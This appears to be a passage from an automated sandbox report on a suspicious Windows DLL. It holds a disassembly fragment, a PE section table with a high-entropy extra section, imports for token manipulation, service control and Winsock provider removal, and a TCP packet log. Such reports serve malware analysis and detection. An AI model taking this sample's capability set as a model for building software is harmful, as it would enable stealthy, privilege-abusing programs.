                                                                                                dec esp
                                                                                                mov ecx, dword ptr [000A759Ch]
                                                                                                inc ebp
                                                                                                xor eax, eax
                                                                                                mov dword ptr [eax+08h], 62756373h
                                                                                                inc esp
                                                                                                mov byte ptr [eax+0Ch], al
                                                                                                dec ecx
                                                                                                arpl word ptr [ecx+3Ch], ax
                                                                                                inc edx
                                                                                                mov ecx, dword ptr [eax+ecx+00000088h]
                                                                                                test ecx, ecx
                                                                                                je 00007F31E86EDB55h
                                                                                                dec ecx
                                                                                                lea eax, dword ptr [ecx+ecx]
                                                                                                inc ebp
                                                                                                mov edx, eax
                                                                                                mov esi, dword ptr [eax+18h]
                                                                                                test esi, esi
                                                                                                jle 00007F31E86EDB47h
                                                                                                inc esp
                                                                                                mov ebx, dword ptr [eax+20h]
                                                                                                mov ebx, dword ptr [eax+24h]
                                                                                                inc esp
                                                                                                mov esi, dword ptr [eax+1Ch]
                                                                                                dec ebp
                                                                                                add ebx, ecx
                                                                                                dec ecx
                                                                                                add ebx, ecx
                                                                                                movzx eax, word ptr [ebx]
                                                                                                dec eax
                                                                                                lea edi, dword ptr [esp+40h]
                                                                                                dec ecx
                                                                                                lea ecx, dword ptr [esi+eax*4]
                                                                                                inc ecx
                                                                                                mov eax, dword ptr [ebx]
                                                                                                inc edx
                                                                                                mov ebp, dword ptr [ecx+ecx]
                                                                                                dec ecx
                                                                                                add eax, ecx
                                                                                                jmp 00007F31E86EDAECh
                                                                                                cmp cl, byte ptr [edi]
                                                                                                jne 00007F31E86EDAEEh
                                                                                                dec eax
                                                                                                inc eax
                                                                                                dec eax
                                                                                                inc edi
                                                                                                mov cl, byte ptr [eax]
                                                                                                test cl, cl
                                                                                                jne 00007F31E86EDAD2h
                                                                                                mov cl, byte ptr [eax]
                                                                                                inc ecx
                                                                                                mov edx, eax
                                                                                                inc ecx
                                                                                                mov eax, eax
                                                                                                cmp cl, byte ptr [edi]
                                                                                                setnbe dl
                                                                                                cmp byte ptr [edi], cl
                                                                                                setnbe al
                                                                                                cmp edx, eax
                                                                                                je 00007F31E86EDAF4h
                                                                                                inc ecx
                                                                                                inc edx
                                                                                                dec eax
                                                                                                add ebx, 02h
                                                                                                dec ecx
                                                                                                add ebx, 04h
                                                                                                inc esp
                                                                                                cmp edx, esi
                                                                                                jl 00007F31E86EDA94h
                                                                                                jmp 00007F31E86EDAE6h

                                                                                                Data Directories

                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0xc2be00x80.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xc2c600x12c.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x1730000x29d.rsrc
                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x16c0000x6498.pdata
                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0xcea980x3f48.data
                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x1740000xff0.reloc
                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x9d5b00x54.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x9d7100x28.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x9d6100x100.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x860000xab8.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                Sections

                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                .text0x10000x849280x84a007cecfc7f755d10f37d8019ee83d7913eFalse0.47230649151743637data6.388288012775588IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                .rdata0x860000x3edf60x3ee0063cfc64e6b66f4b5f42495585448342fFalse0.33804982604373757Sony PlayStation Audio4.482248982092484IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                .data0xc50000xa65180x3000ff509d42bac4371303af1aa4cca9be90False0.23234049479166666SysEx File -4.608801437987786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                .pdata0x16c0000x64980x6600d7c0afebce54eaf77c27bc124f1f0d5dFalse0.5049402573529411data5.912256571930567IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                .rsrc0x1730000x29d0x4003d1e3133eddf2d7b64237cb5d873ee5dFalse0.298828125data3.495284342232033IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                .reloc0x1740000xff00x10006f76baeca3addf9f1f068a1e0392fd3eFalse0.360595703125data5.417278568480602IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                wsgi20x1750000xf0000xf000b7c58b113f4188c6a8fd746cea1c7c0dFalse0.67568359375data7.435435645637308IMAGE_SCN_MEM_READ

                                                                                                Resources

                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                RT_RCDATA0x1730a00x80ASCII text, with no line terminatorsChineseChina0.09375
                                                                                                RT_MANIFEST0x1731200x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                                                                Imports

                                                                                                DLLImport
                                                                                                KERNEL32.dllGlobalLock, GlobalSize, GlobalUnlock, GetFileAttributesExW, GetTickCount, DeviceIoControl, GetCurrentProcessId, GetLongPathNameW, GetWindowsDirectoryW, GetCurrentDirectoryW, MoveFileExW, SearchPathW, CreateThread, WaitForSingleObject, GetCurrentThreadId, GetVersion, GetSystemDefaultUILanguage, GetFileSize, GetLocalTime, VirtualProtect, GetModuleHandleExW, IsBadStringPtrW, ProcessIdToSessionId, OpenProcess, CreateProcessW, WTSGetActiveConsoleSessionId, MapViewOfFile, UnmapViewOfFile, GetProcessId, LocalAlloc, LocalFree, CreateFileMappingW, GetFileSizeEx, GlobalFree, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, ResumeThread, GetSystemTimeAsFileTime, ReleaseMutex, GetSystemTime, SystemTimeToFileTime, SetFileAttributesW, DeleteFileW, OpenFileMappingW, OpenThread, GetCommandLineW, OutputDebugStringW, RtlPcToFileHeader, FormatMessageW, CreateFileA, LocalFileTimeToFileTime, SetFilePointerEx, HeapLock, HeapUnlock, HeapWalk, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, GetFileTime, GlobalAlloc, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, InitializeSListHead, InterlockedFlushSList, ExitProcess, OpenMutexW, CreateMutexW, WideCharToMultiByte, FindResourceExW, InitializeCriticalSectionAndSpinCount, GetModuleFileNameW, RaiseException, InitializeCriticalSection, lstrcmpiW, DeleteCriticalSection, SetLastError, CloseHandle, GetLastError, LoadLibraryW, GetSystemDirectoryW, SetFilePointer, GetVersionExW, GetSystemWindowsDirectoryW, FindResourceW, SizeofResource, LoadResource, LockResource, FreeResource, GetFileInformationByHandle, CreateFileW, Sleep, ReadFile, LeaveCriticalSection, EnterCriticalSection, MultiByteToWideChar, LoadLibraryExW, ExpandEnvironmentStringsW, FreeLibrary, GetCurrentProcess, GetProcAddress, GetModuleHandleW, GetFileAttributesW, GetProcessHeap, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, HeapDestroy, WriteFile, GetExitCodeProcess, IsDebuggerPresent
                                                                                                USER32.dllIsZoomed, GetWindowTextW, SendMessageTimeoutW, SystemParametersInfoW, EnumDisplayDevicesW, GetLastInputInfo, GetClassNameW, GetShellWindow, GetWindowInfo, EnumWindows, WindowFromPoint, GetWindowRect, GetDesktopWindow, GetSystemMetrics, GetWindow, IsWindowVisible, CharNextW, FindWindowW, IsWindow, GetForegroundWindow, MonitorFromWindow, wsprintfW, GetWindowThreadProcessId, SetForegroundWindow, LoadStringW, GetAncestor
                                                                                                ADVAPI32.dllRegDeleteKeyW, ConvertStringSecurityDescriptorToSecurityDescriptorW, LookupAccountSidW, SetSecurityDescriptorDacl, InitializeSecurityDescriptor, CreateProcessAsUserW, CloseServiceHandle, QueryServiceStatus, StartServiceW, ChangeServiceConfigW, OpenServiceW, OpenSCManagerW, GetSidSubAuthority, GetSidSubAuthorityCount, GetTokenInformation, FreeSid, GetLengthSid, SetTokenInformation, AllocateAndInitializeSid, CreateRestrictedToken, DuplicateTokenEx, OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueW, CryptReleaseContext, CryptGenRandom, CryptAcquireContextW, RegEnumValueW, RegCreateKeyW, RegQueryInfoKeyW, RegSetValueExW, RegDeleteValueW, RegEnumKeyExW, RegCreateKeyExW, RegCloseKey, RegQueryValueExW, RegEnumKeyW, RegOpenKeyExW, RegQueryValueExA
                                                                                                SHELL32.dllSHGetPathFromIDListW, SHGetSpecialFolderLocation, ShellExecuteExW, ShellExecuteW, SHGetSpecialFolderPathW, SHGetFileInfoW, SHGetDesktopFolder, SHGetMalloc
                                                                                                ole32.dllGetHGlobalFromStream, IIDFromString, StringFromGUID2, CoInitialize, CreateStreamOnHGlobal, CoCreateInstance, CoTaskMemRealloc, CoTaskMemAlloc, CoTaskMemFree, CoUninitialize
                                                                                                OLEAUT32.dllSysAllocStringByteLen, SafeArrayPutElement, VariantChangeType, VariantInit, SafeArrayCreate, SafeArrayGetElement, VariantClear, SysStringByteLen, SysFreeString, SysAllocString, VarUI4FromStr
                                                                                                SHLWAPI.dllPathRemoveFileSpecW, PathAppendW, SHSetValueW, SHGetValueW, PathAddBackslashW, PathFileExistsW, StrCmpNIW, PathFindFileNameW, PathIsRelativeW, StrCpyNW, PathIsDirectoryW, StrPBrkA, StrPBrkW, StrStrIA, StrStrIW, PathFindExtensionW, SHEnumValueW, StrCmpIW, PathCombineW, StrRetToBufW
                                                                                                WS2_32.dllWSACleanup, WSCDeinstallProvider, WSCDeinstallProvider32, WSCUnInstallNameSpace, WSAGetLastError, WSAStartup, ntohl, htons, htonl, ntohs
                                                                                                VERSION.dllVerQueryValueW
                                                                                                IPHLPAPI.DLLGetIpAddrTable
                                                                                                WTSAPI32.dllWTSFreeMemory, WTSQueryUserToken, WTSQuerySessionInformationW
                                                                                                USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock
                                                                                                PSAPI.DLLGetModuleFileNameExW
                                                                                                msvcrt.dllwcstol, realloc, wcsspn, wcscspn, _mbsstr, _mbsrchr, _mktime64, towupper, memmove, memset, _CxxThrowException, ??0exception@@QEAA@AEBQEBD@Z, ??0exception@@QEAA@AEBV0@@Z, ??1exception@@UEAA@XZ, ?what@exception@@UEBAPEBDXZ, memcpy, memcmp, wcscmp, _amsg_exit, __getmainargs, _initterm, __CxxFrameHandler, __DestructExceptionObject, _localtime64, ___lc_codepage_func, rand, atoi, wcspbrk, __pctype_func, tolower, ___mb_cur_max_func, strtol, localeconv, ___lc_handle_func, abort, memchr, _wcstoui64, _msize, _XcptFilter, mbtowc, strrchr, iswctype, srand, ceil, log10, _clearfp, ?terminate@@YAXXZ, _wtoi, malloc, free, wcsstr, wcschr, wcsncmp, __C_specific_handler, ??_V@YAXPEAX@Z, ??3@YAXPEAX@Z, _wtoi64, _wcsupr, _wcslwr, _strlwr, strchr, _time64, _wcsnicmp, ??2@YAPEAX_K@Z, _wcsicmp, wcsrchr, calloc, iswspace, _errno, ??_U@YAPEAX_K@Z, sqrt

                                                                                                Exports

                                                                                                NameOrdinalAddress
                                                                                                CreateObject20x180004844
                                                                                                homq10x18001b208
                                                                                                RegisterInstallTime30x18005b578

                                                                                                Possible Origin

                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                ChineseChina
                                                                                                EnglishUnited States

                                                                                                Network Behavior

                                                                                                Network Port Distribution

                                                                                                TCP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Apr 26, 2024 23:15:04.716778994 CEST49674443192.168.2.523.1.237.91
                                                                                                Apr 26, 2024 23:15:04.716778040 CEST49675443192.168.2.523.1.237.91
                                                                                                Apr 26, 2024 23:15:04.857433081 CEST49673443192.168.2.523.1.237.91
                                                                                                Apr 26, 2024 23:15:10.389564991 CEST49704443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:10.389621973 CEST4434970440.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:10.389682055 CEST49704443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:10.405672073 CEST49704443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:10.405698061 CEST4434970440.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:10.909099102 CEST4434970440.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:10.909244061 CEST49704443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:11.621540070 CEST49704443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:11.621572018 CEST4434970440.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:11.622569084 CEST4434970440.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:11.625946999 CEST49704443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:11.625981092 CEST49704443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:11.626004934 CEST4434970440.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:11.988576889 CEST4434970440.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:11.988785982 CEST4434970440.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:11.988848925 CEST49704443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:11.989161968 CEST49704443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:11.989191055 CEST4434970440.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:11.989206076 CEST49704443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:11.989212990 CEST4434970440.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:12.105036974 CEST49707443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:12.105082989 CEST4434970740.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:12.105336905 CEST49707443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:12.105782032 CEST49707443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:12.105796099 CEST4434970740.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:12.204886913 CEST49708443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:12.204998016 CEST4434970840.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:12.205251932 CEST49708443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:12.225720882 CEST49708443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:12.225761890 CEST4434970840.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:12.589365005 CEST4434970740.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:12.589457989 CEST49707443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:12.699625969 CEST4434970840.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:12.802778959 CEST49708443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:12.802838087 CEST4434970840.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:12.803749084 CEST49708443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:12.803762913 CEST4434970840.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:12.803808928 CEST49708443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:12.803828955 CEST4434970840.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:12.838834047 CEST49707443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:12.838855982 CEST4434970740.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:12.839143991 CEST4434970740.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:12.840454102 CEST49707443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:12.840512037 CEST49707443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:12.840537071 CEST4434970740.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.202334881 CEST4434970740.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.202428102 CEST4434970740.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.202471018 CEST49707443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:13.253410101 CEST49707443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:13.253410101 CEST49707443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:13.253452063 CEST4434970740.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.253465891 CEST4434970740.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.317842007 CEST49712443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.317924976 CEST44349712142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.318031073 CEST49712443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.318053007 CEST49713443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.318099022 CEST44349713142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.318149090 CEST49713443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.318403006 CEST49713443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.318412066 CEST44349713142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.318665981 CEST49712443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.318696976 CEST44349712142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.339365959 CEST49714443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.339394093 CEST44349714142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.339457035 CEST49714443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.340272903 CEST49714443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.340287924 CEST44349714142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.340735912 CEST49715443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.340817928 CEST44349715142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.340884924 CEST49715443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.341063023 CEST49715443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.341093063 CEST44349715142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.673366070 CEST44349715142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.673778057 CEST49715443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.673816919 CEST44349715142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.674825907 CEST44349715142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.674895048 CEST49715443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.676184893 CEST49715443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.676254034 CEST44349715142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.676374912 CEST49715443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.676403999 CEST44349715142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.706959963 CEST44349712142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.708297014 CEST49712443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.708338022 CEST44349712142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.709819078 CEST44349712142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.709891081 CEST49712443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.710115910 CEST44349713142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.710571051 CEST49712443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.710671902 CEST44349712142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.710767031 CEST49713443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.710784912 CEST44349713142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.710947037 CEST49712443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.710964918 CEST44349712142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.712269068 CEST44349713142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.712483883 CEST49713443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.712810993 CEST49713443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.712898970 CEST44349713142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.712928057 CEST49713443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.756117105 CEST44349713142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.769542933 CEST44349714142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.771267891 CEST49714443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.771281958 CEST44349714142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.772845984 CEST44349714142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.772906065 CEST49714443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.774183989 CEST49714443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.774261951 CEST44349714142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.774349928 CEST49714443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.780086040 CEST49712443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.793756962 CEST49715443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.793817997 CEST49713443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.793836117 CEST44349713142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.820122004 CEST44349714142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.886265993 CEST49712443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.886396885 CEST44349712142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.886456013 CEST49712443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.889004946 CEST49714443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.889018059 CEST44349714142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.984582901 CEST49713443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:14.021025896 CEST44349715142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:14.021279097 CEST44349715142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:14.021362066 CEST49715443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:14.021378040 CEST44349715142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:14.021450043 CEST44349715142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:14.021502018 CEST49715443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:14.021508932 CEST44349715142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:14.031141996 CEST44349715142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:14.034183025 CEST44349715142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:14.034260988 CEST49715443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:14.094002008 CEST49714443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:14.390825033 CEST49675443192.168.2.523.1.237.91
                                                                                                Apr 26, 2024 23:15:14.390830040 CEST49674443192.168.2.523.1.237.91
                                                                                                Apr 26, 2024 23:15:14.452274084 CEST44349714142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:14.452366114 CEST49714443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:14.452444077 CEST44349714142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:14.452619076 CEST44349714142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:14.452686071 CEST49714443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:14.459628105 CEST4434970840.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:14.459660053 CEST4434970840.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:14.459673882 CEST4434970840.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:14.459696054 CEST4434970840.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:14.459705114 CEST4434970840.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:14.459707975 CEST49708443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:14.459712982 CEST4434970840.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:14.459724903 CEST4434970840.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:14.459726095 CEST49708443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:14.459748983 CEST49708443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:14.459772110 CEST49708443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:14.459790945 CEST4434970840.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:14.459871054 CEST4434970840.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:14.459909916 CEST49708443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:14.578308105 CEST49673443192.168.2.523.1.237.91
                                                                                                Apr 26, 2024 23:15:15.001202106 CEST44349713142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:15.001282930 CEST49713443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:15.001317024 CEST44349713142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:15.001384974 CEST44349713142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:15.001430035 CEST49713443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:15.266671896 CEST49708443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:15.266717911 CEST4434970840.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:15.266748905 CEST49708443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:15.266767025 CEST4434970840.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:15.352736950 CEST49714443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:15.352768898 CEST44349714142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:15.354243994 CEST49713443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:15.354288101 CEST44349713142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:15.661475897 CEST49715443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:15.661516905 CEST44349715142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:15.680234909 CEST49719443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:15.680269003 CEST44349719142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:15.680334091 CEST49719443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:15.718099117 CEST49719443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:15.718121052 CEST44349719142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:15.926053047 CEST4434970323.1.237.91192.168.2.5
                                                                                                Apr 26, 2024 23:15:15.926163912 CEST49703443192.168.2.523.1.237.91
                                                                                                Apr 26, 2024 23:15:15.985249043 CEST49721443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:15.985304117 CEST44349721142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:15.985367060 CEST49721443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:15.985583067 CEST49721443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:15.985610962 CEST44349721142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:15.986447096 CEST49722443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:15.986531019 CEST4434972240.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:15.986629963 CEST49722443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:15.986797094 CEST49722443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:15.986830950 CEST4434972240.126.28.23192.168.2.5
